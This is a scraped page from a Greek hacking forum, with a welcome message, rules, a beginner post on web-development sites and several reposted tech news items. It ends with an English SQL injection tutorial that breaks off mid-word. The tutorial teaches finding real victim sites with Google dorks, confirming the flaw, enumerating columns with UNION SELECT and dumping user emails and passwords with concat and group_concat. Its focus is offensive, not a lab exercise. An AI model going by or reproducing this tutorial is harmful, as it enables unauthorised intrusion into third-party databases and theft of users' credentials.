Jump to content

Φιλοσοφία

Το φόρουμ φτιάχτηκε με σκοπό να συσσωρεύσουμε ένα μεγάλο ποσό γνώσης για τους αρχάριους, αλλά ταυτόχρονα να <αποτελέσει> ένα μέρος ώστε άτομα τα όποια έχουν ήδη γνώσης περί του θέματος και βρίσκονται σε μεγάλο επίπεδο, να μπορούν να επικοινωνήσουν με άλλα πρόσωπα με παρόμοιες γνώσεις ώστε να δημιουργήσουν συνεργασίες,να συζητήσουν ιδέες, αλλά και να πάνε τις γνώσεις τους ένα βήμα παραπέρα.

Ευελπιστούμε ότι κάποια στιγμή η Ελλάδα θα έχει μια μεγάλη και ενωμένη κοινότητα πάνω στο hacking όπου θα έχει την δυνατότητα να κάνει τον κόσμο καλύτερο.
  • Sites για να ξεκινήσετε!!!

    Αναφέρομαι σε άτομα που είναι καινούρια στο site και αναζητούν βοήθεια από που θα ξεκινήσουν...
    Αν έχετε αποφασίσει να ασχοληθείτε  με τις ιστοσελίδες  τους σερβερς ή γενικά με το web development τότε έχω να σας προτείνω κάποιες σελίδες που με έχουν βοηθήσει πάρα πολύ:
    1η είναι το codeacademy  :
    https://www.codecademy.com/
    2η είναι το w3schools  :
    https://www.w3schools.com/
    Και οι δύο σελίδες έχουν πολλά courses σχετικά με html/css/javascript/php/sql/python/ruby/java και πολλά άλλα.
    Ελπίζω να σας βοήθησα έστω και λίγο...!! 
     
    • Από: KING
    • 81 views
    • 0 comments

Καλώς ήρθες στο GreekHacking-Το σπίτι του χάκερ

Αγαπητό μέλος,

Καλώς  ήρθες στο GreekHacking.Gr!

Μην αγχώνεσε!

Το forum δεν είναι άδειο,  αντιθέτως περιέχει πολύ υλικό, αλλά για να το ξεκλειδώσεις διάβασε παρακάτω.

Πρέπει να ξέρεις  ότι το GreekHacking.Gr είναι η μεγαλύτερο hacking κοινότητα στην Ελλάδα και συνολικά έχει πάνω απο 9 χιλιάδες μέλη και χιλιάδες μηνύματα.

Πρέπει να σε ενημερώσουμε όμως, ότι για να έχεις πλήρη πρόσβαση στο forum θα πρέπει  πρώτα να ακολουθήσεις  και τους κανόνες .

Σαν νέο μέλος, δεν βλέπεις  καμιά απολύτως κατηγορία εκτός απο τις  βασικές, αυτο συνέβη γιατί θα πρέπει να σε γνωρίσουμε πρώτα, και να μας γράψεις λίγα λόγια για σένα, εκτός απο αυτο το κάνουμε για να αποφύγουμε τους spammers.

Έτσι, για να ξεκλειδώσεις όλες τις κατηγορίες του forum θα πρέπει απλά να γράψεις εδώ λίγα λόγια για σένα.

Οταν μας γράψεις, αυτομάτως απο την ομάδα Registered Member που ανήκεις τώρα, θα πας στην New Member και θα έχεις πλήρη πρόσβαση στο forum και φυσικά και στο Chat.

 

                                                            Ακόμα να σε ενημερώσουμε ότι το forum είναι δωρεάν, και δεν υπάρχει κάποιος κόστος σε κάτι.


  • Ανακοινώσεις

    • Admin

      Πληροφορίες για πρόσβαση στις κατηγορίες "AdvanCed" και "L33t" Hacker   21/07/2016

      Για να έχετε πρόσβαση στις κατηγορίες του "AdvanCed Hacker" και "L33t Hacker" αντιστοιχα, πρέπει: Να καταφερετε να φτασετε στο rank "Pro Hacker" και "Elite Hacker" ή "Guru" στο Hack The Box Eπειτα το μονο που εχετε να κανετε ειναι να ενημερωσετε καποιον απο τους διαχειριστες για να σας δωσει προσβαση στην αναλογη κατηγορια   *Στην κατηγορια L33t Hacker θα εχουν προσβαση απευθειας, ΜΟΝΟ αν το κρινουν τα μελη που ειναι ηδη στην κατηγορια οτι αξιζει καποιος να εχει προσβαση χωρις να δοκιμαστει.

Όλες η Ενεργές

This stream auto-updates     

  1. Past hour
  2. Μια αίτηση εργασίας που είχε υποβάλει ο αείμνηστος Στιβ Τζομπς πριν από τέσσερις και πλέον δεκαετίες που αντικατοπτρίζει τη φιλοδοξία του μελλοντικού ιδρυτή της Apple να εργαστεί στην τεχνολογία και στη σχεδίαση, η αξία της οποίας εκτιμάται περίπου στα 50.000 δολάρια, θα βγει στο σφυρί τον προσεχή μήνα. Στη μονοσέλιδη αίτηση που συμπλήρωσε το 1973 ο 18χρονος Τζομπς κάνοντας λάθη στην ορθογραφία και στα σημεία στίξης, γράφει στο πεδίο του ονόματος: «Steven jobs» και σε αυτό της διεύθυνσης: «Reed College», το κολέγιο στο Όρεγκον όπου φοίτησε για σύντομο χρονικό διάστημα. Αναφέρει ότι είναι χαρισματικός στις ηλεκτρονικές τεχνολογίες και στο βιομηχανικό σχέδιο, ανακοίνωσε ο οίκος δημοπρασιών RR στη Βοστόνη. Στο πεδίο «Ειδικά προσόντα» ο Τζομπς γράφει «τεχνολογία, μηχανικός σχεδίασης, ψηφιακή τεχνολογία», κάνοντας μια αναφορά στη Hewitt-Packard, την πρωτοπόρα καλιφορνέζικη εταιρία τεχνολογίας. Στην αίτηση εργασίας δεν αναφέρεται για ποια θέση ενδιαφέρεται ο Τζομπς, ο οποίος μαζί με τον φίλο του Στίβεν Βόζνιακ ίδρυσαν την Apple περίπου τρία χρόνια αργότερα. Ο Τζομπς πέθανε από καρκίνο το 2011 σε ηλικία 56 ετών. Παρότι ο Τζομπς συμπλήρωσε στην αίτηση ότι έχει άδεια οδήγησης, έγραψε ότι η πρόσβασή του στα μέσα μεταφοράς ήταν «δυνατή αλλά όχι πιθανή». Δίπλα στο πεδίο «Τηλέφωνο», έγραψε «κανένα», όπως μεταδίδει το AFP και αναμεταδίδει το Αθηναϊκό Πρακτορείο Ειδήσεων. Η αίτηση αυτή περιλαμβάνεται στη δημοπρασία αντικειμένων ποπ κουλτούρας που θα διεξαχθεί μεταξύ 8 και 16 Μαρτίου, μαζί με δύο ακόμη προσωπικά αντικείμενα του Τζομπς: ένα τεχνικό εγχειρίδιο Mac OS X που υπογράφει ο ίδιος το 2001, αξίας 25.000 δολαρίων, και ένα υπογεγραμμένο απόκομμα εφημερίδας του 2008, με φωτογραφία του Τζομπς και τίτλο «Νέο, γρηγορότερο iPhone θα πωλείται αντί 199 δολαρίων», αξίας 15.000 ευρώ. Η δημοπρασία περιλαμβάνει μια κάρτα με τα αποτυπώματα του Τζίμι Χέντριξ από τη σύλληψή του στο Τορόντο το 1969 για ναρκωτικά, που φέρει την υπογραφή του αείμνηστου μουσικού της ροκ, η αξία της οποίας εκτιμάται στα 15.000 δολάρια. Επίσης, μια μονοσέλιδη ερωτική επιστολή της Έιμι Γουαϊνχάουζ στον σύζυγό της Μπλέικ Φίλντερ-Σίβιλ, εκτιμάται στα 4.000 δολάρια. Η βρετανίδα τραγουδίστρια στολίζει την επιστολή εκτός από τα τρυφερά της λόγια, με ένα σκίτσο που παρουσιάζει ένα κροκοδειλάκι βρέφος το οποίο περιβάλλει με καρδούλες. Η Γουαϊνχάουζ πέθανε από οξεία δηλητηρίαση από αλκοόλ στο Λονδίνο το 2011 σε ηλικία 27 χρονών. Προβολή Άρθρου
  3. Με τεχνολογία τεχνητής νοημοσύνης που δανείστηκε από τα αυτοκινούμενα οχήματα, η κάμερα της Lighthouse είναι η μόνη στον κόσμο που λειτουργεί ως προσωπικός σύμβουλος ασφαλείας! Γιατί είναι μια έξυπνη κάμερα που είναι πράγματι αυτό, έξυπνη. Δεν βασίζεται σε αισθητήρες κίνησης για να ξέρει τι της γίνεται, παρά σε αλγόριθμους τεχνητής νοημοσύνης. Κι έτσι αποφεύγει τους λάθος συναγερμούς από σκιές ή αλλαγές στο φως, μιας και μπορεί να διακρίνει τα πάντα. Και να τα καταλάβει, που είναι και το ζητούμενο. Ξέρει να ξεχωρίσει μεταξύ ενηλίκων, παιδιών και κατοικιδίων και θα μάθει μάλιστα τα μέλη της οικογένειας, αλλά και τους καλούς φίλους, ώστε να ξέρει πότε κάποιος είναι καλεσμένος και πότε εισβολέας! Και το κάνει αυτό με τεχνολογίες αναγνώρισης προσώπων. Είναι μια κάμερα 299 δολαρίων βέβαια, κάνει ωστόσο πολλά περισσότερα από όλες τις άλλες, μιας και είναι το πνευματικό παιδί κάποιων τζιμανιών που εργάζονταν σε αυτοκινούμενα οχήματα και πληροφοριακά συστήματα πανεπιστημιακών κέντρων και μεγάλων εταιριών τεχνολογίας. Η τεχνητή νοημοσύνη της Lighthouse ΑΙ προσπαθεί να καταλάβει τον κόσμο, όχι να τον απεικονίσει απλώς. Καταγράφει υψηλής ευκρίνειας εικόνα στα 1080p σε 24ωρη βάση και αποθηκεύει το υλικό για 30 μέρες, αναγνωρίζοντας πρόσωπα και ανταποκρινόμενη στις καθημερινές συνήθειες της οικογένειας. Με 3D αισθητήρες και αλγόριθμους που μαθαίνουν συνεχώς, «καταπίνει» την πραγματικότητα και παρακολουθεί γνωστά και άγνωστα πρόσωπα στο σπίτι, ανταποκρινόμενη ολότελα διαφορετικά. Και την προγραμματίζεις να κάνει ό,τι θες: «Πες μου αν είδες κάποιον που δεν αναγνωρίζεις σήμερα στο σπίτι», της λες από την εφαρμογή που την ελέγχει (ακόμα και φωνητικά), ή «πες μου αν μπήκε κάποιος στο σπίτι μεταξύ 3-5 μ.μ.». Η εφαρμογή φτιάχνει αυτόματα τα προφίλ των μελών του σπιτιού, αλλά και των ανθρώπων που μπαίνουν συχνά, όπως φίλοι και γνωστοί, η οικιακή βοηθός και η babysitter, και μαθαίνει να τους θεωρεί φίλους και όχι εισβολείς. Κι έτσι μπορείς να τη ρωτήσεις ακόμα και τι ώρα γύρισε ο κανακάρης από το σχολείο του. Και θα σου πει με ακρίβεια μέχρι… παρεξηγήσεως. [embedded content] Προβολή Άρθρου
  4. Today
  5. Το Facebook αποτελεί το πιο δημοφιλές κοινωνικό δίκτυο με εκατομμύρια ενεργούς χρήστες ημερησίως. Πόσα ξέρετε όμως για τον βασιλιά των μέσων κοινωνικής δικτύωσης; Δείτε μερικά δεδομένα... Οι χρήστες των smartphones μπαίνουν στο Facebook κατά μέσο όρο 14 φορές την ημέρα. Άνθρωποι έχουν δολοφονηθεί γιατί έχουν διαγράψει κάποιον από φίλο στο Facebook. Μελέτη έχει δείξει ότι 1 στα 3 άτομα αισθάνεται δυσαρεστημένο με τη ζωή του μετά από μια επίσκεψη στο Facebook. Ένας από τους βασικούς λόγους για τους οποίους το Facebook είναι μπλε είναι ότι ο Mark Zuckerberg δεν μπορεί να ξεχωρίσει το κόκκινο και το πράσινο λόγω πάθησης. Στο Facebook υπάρχουν περίπου 30 εκατομμύρια προφίλ νεκρών. Το ένα τρίτο όλων των αιτήσεων διαζυγίου το 2011 στις ΗΠΑ περιείχε τη λέξη Facebook. Το 8.7% των προφίλ στο Facebook είναι ψεύτικα. Κάθε λεπτό γίνονται 1,8 εκατομμύρια likes από χρήστες. Ο μέσος χρήστης του Facebook έχει 155 φίλους, αλλά θα στρεφόταν σε μόλις 4 για βοήθεια, σύμφωνα με έρευνες. Το Facebook έχει μια λειτουργία που μας επιτρέπει να ορίσουμε ποιος θα διαχειριστεί το λογαριασμό μας μετά το θάνατό μας. Προβολη του αρθρου
  6. To Twitter ξεκίνησε την εκκαθάριση κακόβουλων και προπαγανδιστικών λογαριασμών από αυτόνομα προγράμματα λογισμικού (bots) που προσποιούνται τους χρήστες και χειραγωγούν το δημόσιο διάλογο. Όμως, ορισμένοι πραγματικοί χρήστες, ιδίως δεξιών πολιτικών πεποιθήσεων, που θεωρούν πως πέφτουν θύμα της «εκστρατείας», ξεσηκώθηκαν ότι γίνεται κυνήγι μαγισσών εναντίον τους. Τα hashtags #TwitterLockout και #TwitterPurge έγιναν δημοφιλή, καθώς δεκάδες χρήστες ανέφεραν ότι μπλοκαρίστηκαν οι λογαριασμοί τους, εωσότου απέδειξαν -δίνοντας και μετά επαληθεύοντας έναν αριθμό τηλεφώνου- ότι δεν ήταν bots. Ορισμένοι διαμαρτυρήθηκαν ότι έχασαν πολλούς «ακολούθους» και ότι το Twitter κάνει διακρίσεις εναντίον των συντηρητικών πολιτικών απόψεων. 'Αλλοι πάλι τους κορόϊδεψαν και αρνήθηκαν ότι κάτι τέτοιο συμβαίνει. Το ίδιο το Twitter δήλωσε, σύμφωνα με το BBC και τα πρακτορεία Reuters και Γαλλικό, ότι «τα εργαλεία μας είναι απολίτικα και εφαρμόζουμε τους κανόνες μας χωρίς πολιτική μεροληψία». Διαβεβαίωσε ότι συνεχίζει σε καθημερινή βάση να αναζητά και να εξουδετερώνει λογαριασμούς με ύποπτες συμπεριφορές, που υποδηλώνουν ότι ανήκουν σε αυτοματοποιημένα bots ή που παραβιάζουν τους κανονισμούς του μέσου κοινωνικής δικτύωσης, έχοντας κακόβουλους ή άδηλους στόχους. Το Twitter δεν θα απαγορεύσει τελείως τη χρήση τέτοιων αυτόνομων προγραμμάτων λογισμικού που μπορεί να είναι χρήσιμα, για παράδειγμα οι αυτοματοποιημένες προειδοποιήσεις για σεισμό, για τον καιρό ή για άλλες δημόσιες και κοινωνικά ωέλιμες υπηρεσίες. Προσπαθεί όμως να ξεχωρίσει την ήρα από το στάρι, μετά τις επικρίσεις που έχει δεχτεί -όπως και το Facebook- ότι η Ρωσία χρησιμοποίησε κατευθυνόμενους λογαριασμούς για να εξαπολύσει πόλεμο παραπληροφόρησης εναντίον των ΗΠΑ. Το Twitter έκανε γνωστό ότι πλέον δεν θα επιτρέπει να αναρτώνται, ούτε από ανθρώπους χρήστες ούτε από bots, πανομοιότυπα μηνύματα από πολλαπλούς λογαριασμούς του, μία τακτική που θεωρείται ότι χρησιμοποιούν ρώσοι πράκτορες για να δημιουργούν στοχευμένα μηνύματα (tweets), τα οποία εξαπλώνονται σαν ιός στο διαδίκτυο (γίνονται δηλαδή viral). Επίσης, το Twitter απαγόρευσε πια τη χρήση bots που επιτρέπουν σε χρήστες να εκτελούν ταυτόχρονες δραστηριότητες σε μαζική κλίμακα από πολλαπλούς λογαριασμούς, όπως τα απανωτά likes και retweets. Στόχος αυτών των αλλαγών, σύμφωνα με την εταιρεία, είναι να υπάρξει «ποιότητα στη διάχυση των πληροφοριών» και περιορισμός «της κακόβουλης δραστηριότητας που στοχεύει σε κρίσιμες συνομιλίες, οι οποίες λαμβάνουν χώρα στο Twitter, όπως οι εκλογές στις ΗΠΑ και σε όλο τον κόσμο». Το Twitter ανακοίνωσε ότι δίνει περιθώριο στους χρήστες, έως τις 23 Μαρτίου, για να συμμορφωθούν και μετά θα διαγράφει τους λογαριασμούς που «κάνουν του κεφαλιού τους». Προβολη του αρθρου
  7. Εχθές
  8. Κάτι παρόμοιο σε ελληνικά παίζει;
  9. Με την παραδοχή ότι αποτελεί προτεραιότητα για όλους η προστασία από την πειρατεία στο διαδίκτυο, έκλεισε η ημερίδα με τίτλο «Προσβολή Δικαιωμάτων Πνευματικής Ιδιοκτησίας Στο Διαδίκτυο. Εξελίξεις σε Ελλάδα & Ευρωπαϊκή Ένωση» την οποία διοργάνωσαν σήμερα η Google και ο Οργανισμός Πνευματικής Ιδιοκτησίας, στην Αίγλη Ζαππείου. Στην ημερίδα συμμετείχαν το Πανεπιστήμιο της Λευκωσίας και το Διεθνές Πανεπιστήμιο της Ελλάδος. Στην ημερίδα μίλησαν νομικοί, εκπρόσωποι του πνευματικού κόσμου, καλλιτέχνες, και οι εκπρόσωποι δύο εκ των μεγαθηρίων του διαδικτύου αυτή τη στιγμή, Google και Facebook. Αφού έγινε αναφορά στα αμέτρητα περιστατικά πειρατείας στο διαδίκτυο, τα οποία αυξάνονται με ραγδαίο ρυθμό παγκοσμίως, οι περισσότεροι ομιλητές εστίασαν στο τι πρέπει να γίνει εδώ και τώρα. Όπως μετέδωσε το Αθηναϊκό Πρακτορείο, η εκπρόσωπος της Google σημείωσε ότι όλες οι δυνάμεις της εταιρείας στρέφονται στην καταπολέμηση της πειρατείας, παρουσιάζοντας προϊόντα της εταιρείας, τα οποία, όπως ανέφερε η κα Μπερνάλ (J. Bernal), θα παρέχουν προσβάσιμες λύσεις στο κοινό. Επίσης, υπογράμμισε ότι η Google θα αφαιρεί πάραυτα ό,τι σχετίζεται με πειρατικό - παράνομο υλικό από τη μηχανή αναζήτησής της. Μιλώντας για το εταιρικό της «αδερφάκι» το YouTube στο οποίο κάθε λεπτό «ανεβαίνουν» 400 ώρες υλικού, η εκπρόσωπος της Google σημείωσε ότι παρά τον τεράστιο όγκο των δεδομένων που πρέπει να αναλυθούν, και εκεί η πολιτική της εταιρείας είναι αμείλικτη όσον αφορά παράνομο περιεχόμενο, με αποτέλεσμα να κλείνουν ακόμα και ολόκληρα κανάλια μετάδοσης σε περίπτωση που αυτά δεν έχουν την απαραίτητη άδεια. Προτεραιότητα αποτελεί και για το Facebook η καταπολέμηση του παράνομου υλικού με στόχο την ασφάλεια των χρηστών του, σημείωσε η εκπρόσωπος του μέσου. Όσον αφορά τον περίφημο αλγόριθμο, ο οποίος φέρνει στους χρήστες αποκλειστικά υλικό που τους ενδιαφέρει, η κα Μπονοντσίνι (L. Bononcini), σημείωσε ότι αυτό αποτελεί πολιτική ασφαλείας της εταιρείας για να διαφυλάξει τους χρήστες της, τονίζοντας ωστόσο και αυτή ότι χρήστες που δεν σέβονται και δεν τηρούν την πολιτική ασφαλείας του Facebook θα διαγράφονται αυτομάτως. Σύμφωνα με κοινοτική οδηγία της ΕΕ η οποία ισχύει από το 2014, υπάρχει ρύθμιση για πολυεδαφικές άδειες για τις online χρήσεις. Η οδηγία ωστόσο αφορά μόνο νόμιμα αδειοδοτημένα μουσικά έργα εξαιρουμένων των συγγενικών δικαιωμάτων. Σε έναν χώρο όπου το διαδίκτυο καταλαμβάνει πλέον τα πάντα, είναι σαφές ότι ανάλογες οδηγίες πρέπει να ληφθούν για το σύνολο της πνευματικής ιδιοκτησίας. Εκεί πάνω εστιάστηκαν οι περισσότερες παρεμβάσεις του τρίτου και τελευταίου πάνελ της ημερίδας, στο οποίο καλλιτέχνες, εκδότες και νομικοί εκπρόσωποι εταιρειών παρόχων περιεχομένου μίλησαν για την απαίτηση ενός θεσμικού πλαισίου από την Πολιτεία το οποίο θα διαφυλάττει την πνευματική περιουσία. Στην Ελλάδα δεν υπάρχει η κατάλληλη κουλτούρα και Παιδεία ότι η πνευματική ιδιοκτησία αποτελεί περιουσιακό στοιχείο, σημείωσε ο μουσικοσυνθέτης Γιώργος Ανδρέου ενώ και η γνωστή τραγουδοποιός Χαρούλα Αλεξίου ανέφερε ότι η Πολιτεία πρέπει επιτέλους να κοιτάξει το πρόβλημα το οποίο χρειάζεται απλά κοινό νου για να καταπολεμηθεί. Η κα Αλεξίου εξέφρασε και μια άλλη φωνή, σημειώνοντας ότι Google και Facebook κάνουν γνωστό το έργο καλλιτεχνών, κερδίζοντας αυτοί από διαφήμιση, με τον δημιουργό του έργου να μη λαμβάνει ποτέ αμοιβή για το έργο του. «Η απόφαση για μπλοκάρισμα των πειρατών πρέπει να είναι δυναμική για να είναι αποτελεσματική» σημείωσε στο πρώτο πάνελ ο Geerart Bourlon ο οποίος εκπροσωπούσε την Ένωση Εταιρειών Κινηματογράφου Αμερικής για να υπερθεματίσει πάνω σε αυτό ο νομικός εκπρόσωπος της Forthnet/NOVA Β. Πατσιαντός. Ο εκπρόσωπος της NOVA χαιρέτισε τις πρωτοβουλίες που λαμβάνει η κυβέρνηση για την προστασία γενικότερα της πνευματικής ιδιοκτησίας στο διαδίκτυο λέγοντας ότι η εταιρεία του ως πάροχος περιεχομένου θα συμπορευθεί με όλους τους φορείς για την πάταξη της πειρατείας. Στην Ελλάδα η πειρατεία στο διαδίκτυο έχει λάβει ανησυχητικές διαστάσεις με αποτέλεσμα μεγάλη απώλεια εσόδων για το Δημόσιο μέσω της φορολογίας, σημείωσε η νομική εκπρόσωπος της OTE TV κα Β. Αλευρίδου, υπογραμμίζοντας ότι αυτά τα χρήματα θα μπορούσαν να ενισχύσουν την οπτικοακουστική παραγωγή της χώρας, την Παιδεία κλπ. Τέλος, στο κλείσιμο της ημερίδας ακούστηκαν φωνές από συγγραφείς και δημοσιογράφους οι οποίοι υπογράμμισαν ότι εκτός από την οπτικοακουστική πειρατεία, μεγάλο πρόβλημα αποτελεί και το λεγόμενο clopy paste, με αναπαραγωγή κλεμμένης δουλειάς άλλων, κάτι για το οποίο πρέπει να ληφθεί αντίστοιχη μέριμνα από όλους τους εμπλεκόμενους φορείς. Προβολη του αρθρου
  10. Από τα παγόνια μέχρι και τους εξωτικούς δηλητηριώδεις βατράχους, η χλωρίδα και η πανίδα είναι γεμάτες από όλων των λογιών τα ζωντανά, φανταχτερά και εντυπωσιακά χρώματα. Είναι τέτοια μάλιστα η ποικιλία των χρωμάτων της φύσης που οι επιστήμονες χρειάζονται βδομάδες ολόκληρες για να αναπαράγουν εργαστηριακά ένα μόνο φυσικό χρώμα (και ειδικά το κόκκινο), με τη βοήθεια πάντα της λιθογραφίας ηλεκτρονικής δέσμης, μιας νανοτεχνολογίας που βασίζεται σε δέσμες ηλεκτρονίων που «γράφουν» χρώματα σε επιφάνειες. Πλέον όμως το Πανεπιστήμιο του Κέιμπριτζ βρήκε πως τα δύστροπα αυτά φυσικά χρώματα έχουν έναν γενετικό κώδικα που μπορεί να αντιγραφεί! Η μελέτη εξέτασε τις γενετικές μεταλλάξεις του φλαβοβακτηρίου IR1, το οποίο αντανακλά διαφορετικά μήκη κύματος για να παράγει το δικό του πράσινο μεταλλικό χρώμα. Και το κάνει αυτό με τρόπο εντελώς ιδιοσυγκρασιακό, καθώς δεν χρειάζεται χρωστικές (όπως η χλωροφύλλη ή η μελανίνη) για το καλογυαλισμένο χρωματικό αποτέλεσμά του, παρά το μυστικό βρίσκεται στη δική του, εσωτερική, νανοδομή. Οι ερευνητές μετάλλαξαν γενετικά το φλαβοβακτήριο για να δουν αν θα διατηρήσει τις χρωστικές ιδιότητές του και βρήκαν πως το πείραμα όχι μόνο δούλεψε, αλλά απέδωσε και όλο το φάσμα του ορατού φωτός, από το μπλε ως το κόκκινο! Έχοντας κατανοήσει λοιπόν τον γενετικό κώδικα πίσω από τα φυσικά χρώματα, οι επιστήμονες εμφανίζονται αισιόδοξοι ότι μπορούν να αναπαράγουν τα μοναδικά χρώματα της φύσης μέσα σε 24 ώρες: «Το μέλλον είναι ανοιχτό για βιοδιασπώμενες μπογιές στα αυτοκίνητα και τους τοίχους μας, αναπτύσσοντας απλώς το ακριβές χρώμα και την απόχρωση που θέλουμε», λέει η καθηγήτρια χημείας του Κέιμπριτζ, Silvia Vignolini. Αναπτύσσοντας απλώς τις αντίστοιχες αποικίες των φλαβοβακτηρίων δηλαδή! Προβολη του αρθρου
  11. Καλώς ήρθες στην παρέα μας!
  12. Simple Sqli guide

    Contents Understanding SQL Injection ------ Searching for Targets Testing Targets for Vulnerabilities Finding Columns Finding Vulnerable Columns ------ Obtaining the SQL version Version 4 - 1. Obtaining Tables & Columns - 2. Commands Version 5 - 1. Obtaining Table Names - 2. Obtaining Column Names from Tables ------------------------------------------------------------------------ Understanding SQL Injection SQL Injection is one of most powerful methods of system penetration, using error based queries one is able to extract data (tables & columns) from a vulnerable system, namely the (database). ------------------------------------------------------------------------ Searching for Targets The beauty of searching for targets is a lot easier than it sounds, the most common method of searching is (Dorks). Dorks are an input query into a search engine (Google) which attempt to find websites with the given text provided in the dork itself. So navigate to Google and copy the following into the search box: inurl:"products.php?prodID=" This search will return websites affiliated with Google with "products.php?prodID=" within the URL. You can find a wide range of dorks to use by searching the forum. I advise you to create your own dorks, be original, but at the same time unique, think of something to use that not many people would have already searched and tested. An example of a dork I would make up: inurl:"/shop/index.php?item_id=" & ".co.uk" So using your own dorks isn't a bad thing at all, sometimes your dorks wont work, nevermind even I get it.. ------------------------------------------------------------------------ Testing Targets for Vulnerabilities I'll explain this as simply as I can. After opening an URL which you have found in one of your dork results on Google you need to test the site if it's vulnerable to SQL injection. Example: http://www.site.com/index.php?Client_id=23 To test, just simply add a single quote at the end of the URL Example: http://www.site.com/index.php?Client_id=23' How to tell if the sites vulnerable: - Missing text, images, spaces or scripts from the original page. - Any kind of typical SQL error (fetch_array) etc. So if the website you're testing produces any of the above then the site is unfortunately vulnerable, which is where the fun starts. ------------------------------------------------------------------------ Finding Columns & the Vulnerable Columns Example: http://www.site.com/index.php?Client_id=23' ^^^^^^^^^^^^^^^^^^^^^^^^ IF THE SITE IS VULNERABLE Refer to the following to checking how many columns there are. (order+by) the order by function tells the database to order columns by an integer (digit e.g. 1 or 2), no errors returned means the column is there, if there's an error returned the column isnt there www.site.com/index.php?Client_id=23+order+by+1 < No Error www.site.com/index.php?Client_id=23+order+by+2 < No Error www.site.com/index.php?Client_id=23+order+by+3 < No Error www.site.com/index.php?Client_id=23+order+by+4 < ERROR From using order+by+ command and increasing the number each time until the page displays an error is the easiest method to find vulnerable columns, so from the examples above when attempting to order the columns by 4 there's an error, and so column 4 doesn't exist, so there's 3 columns. ------------------------------------------------------------------------ Finding Vulnerable Columns Ok so let's say we were working on the site I used above, which has 3 columns. We now need to find out which of those three columns are vulnerable. Vulnerable columns allow us to submit commands and queries to the SQL database through the URL. (union+select) Selects all columns provided in the URL and returns the value of the vulnerable column e.g. 2. Example: wxw.site.com/index.php?Client_id=23+union+select+1,2,3 The site should refresh, not with an error but with some content missing and a number is displayed on the page, either 1, 2 or 3 (as we selected the three columns in the above URL to test for column vulnerability). Sometimes the page will return and look completely normal, which isn't a problem. Some sites you are required to null the value you're injecting into. In simpler terms, the =23 you see in the above URL after Client_id must be nulled in order to return with the vulnerable column. So we simply put a hyphen (minus sign) before the 23 like so: -23 So the URL should now look something like this: www.site.com/index.php?Client_id=-23+union+select+1,2,3 Now that should work, let's say the page refreshes and displays a 2 on the page, thus 2 being the vulnerable column for us to inject into. ------------------------------------------------------------------------ Obtaining the SQL Version Easier said than done, using the information found in the above sections e.g. amount of columns and the vulnerable column. We now use a command (@@version) and in some cases a series of commands to determine what the SQL version is on the current site. Version 4 or version 5. See the example below to view what a URL should look like when the version command has been inserted into the URL replacing the number 2 as 2 is the vulnerable column on the example site. Example: www.site.com/index.php?Client_id=-23+union+select+1,@@version,3 What you need to look for is a series of numbers e.g: 5.0.89-community 4.0.45-log If the above fail and the site just returns an error or displays normally then we need to use the convert function in order for the server to understand the command, don't worry though this is usually the only thing you need to convert and it's on a rare occasion where this is the case. So, if the example site returned an error we need to replace @@version with the convert() function: convert(@@version using latin1) So the example site will now look like this: www.site.com/index.php?Client_id=-23+union+select+1,convert(@@version using latin1),3 Now if the page still decides to not return the error then the query must be hexed: unhex(hex(@@version)) So the example site will now look like this: www.site.com/index.php?Client_id=-23+union+select+1,unhex(hex(@@version)),3 Depending on which version the SQL server it is, whether it be 4, or 5 the queries for obtaining data from both versions are different, version 4 and 5 tables are explained below ------------------------------------------------------------------------ Obtaining Tables and Columns You will notice that obtaining tables and columns from version 4 MySQL servers is a little more time consuming and confusing at times as we have to guess pretty much everything. Because version 5 is more up to date and has information_schema which the database and tables are stored in, MySQL version 4 doesn't. Providing the MySQL version of the website is 4, we must do the following. So, back to the example URL: www.site.com/index.php?Client_id=23+union+select+1,@@version,3 We must now go back to the original URL which is: www.site.com/index.php?Client_id=23+union+select+1,2,3 This is where the guessing begins, we need to guess table names. How can we tell if the table name I guess exists? The same as where we tested for the amount of columns. If no error is produced then the table guessed exists. Is there is an error then the table guessed doesn't exist, so just try another. So we use the (from) command followed by the table name you are looking to see if exists. Example: www.site.com/index.php?Client_id=23+union+select+1,2,3 from admin Usual tables most people search for consist of obtaining user data, so again, be creative just like with the dorks, common table names I use: tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins So if we tried the following as an example: www.site.com/index.php?Client_id=23+union+select+1,2,3 from admin ^^^ Error www.site.com/index.php?Client_id=23+union+select+1,2,3 from user ^^^ Error www.site.com/index.php?Client_id=23+union+select+1,2,3 from users ^^^^^ No Error Now which table do you think exists..? The table users exists We are now required to guess column names from the existing table. So thinking logically, which labelled columns within this table would represent data? Columns such as: first_name, last_name, email, username, password, pass, user_id ^^^^^^^^^^^^^^^^^^^^^^^^^ Typical columns found in the users table. So we now must think back to which column is vulnerable (in this case 2) and so we'll use the URL and replace 2 with the column name you are attempting to see if exists in the users table. Let's try a few of the typicals listed above: www.site.com/index.php?Client_id=23+union+select+1,f_name,3 from users ^^^^ Error www.site.com/index.php?Client_id=23+union+select+1,l_name,3 from users ^^^ Error www.site.com/index.php?Client_id=23+union+select+1,address1,3 from users ^^^ Error www.site.com/index.php?Client_id=23+union+select+1,email,3 from users ^^^^^ No Error From the above we can clearly see that the column email exists within the table users, the page should return displaying data (most probably an email address) or the data you are extracting i.e if you pulled password from users and the column exists the first password within that column will be displayed on screen. Commands From here we will be able to use certain commands to determine the amount of data we pull from the database or which exact record you wish to pull from a column. concat() We will now use the concat() function to extract data from multiple columns if only one column is vulnerable, in this case remembering back the vulnerable column is 2, so we can only query in within this space. Command: concat(columnname1,0x3a,columnname2) 0x3a is the hex value of a semi-colon : so the output data from the query will be displayed like:this Example: www.site.com/index.php?Client_id=23+union+select+1,concat(email,0x3a,password),3 from users The above will output the first email and password found in the table. group_concat(): We will now use the group_concat() function to group all data from one column and display them on one page. Same as the above concat() command just grouping all records together and displaying them as one. Example: wxw.site.com/index.php?Client_id=23+union+select+1,group_concat(email,0x3a,pass),3 from users Now the above should return ALL e-mails and passwords listed in the email and passwords column within the users table. limit 0,1 The limit command is somewhat useful if you're looking for a specific data record. Say for instance we wanted to obtain the 250th record for emails in the table users. We would use: limit 250,1 Thus displaying the 250th e-mail within the data. Example: www.site.com/index.php?Client_id=23+union+select+1,email,3+from+users+limit+250,1 ------------------------------------------------------------------------ Version 5 Obtaining Table Names Obtaining table names for version 5 MySQL servers is simple, using information_schema.tables < For table extraction So, example of the URL from earlier, but imagine it is now version 5 Example: www.site.com/index.php?Client_id=-23+union+select+1,table_name,3+from+information_schema.tab 